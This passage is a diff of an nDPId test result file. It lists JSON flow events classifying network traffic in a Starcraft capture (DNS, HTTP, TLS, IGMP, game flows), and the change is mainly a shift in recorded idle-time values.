{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} +00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} 00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389976946,"flow_last_seen":1437389980126,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389985821,"flow_last_seen":1437389985912,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":388,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 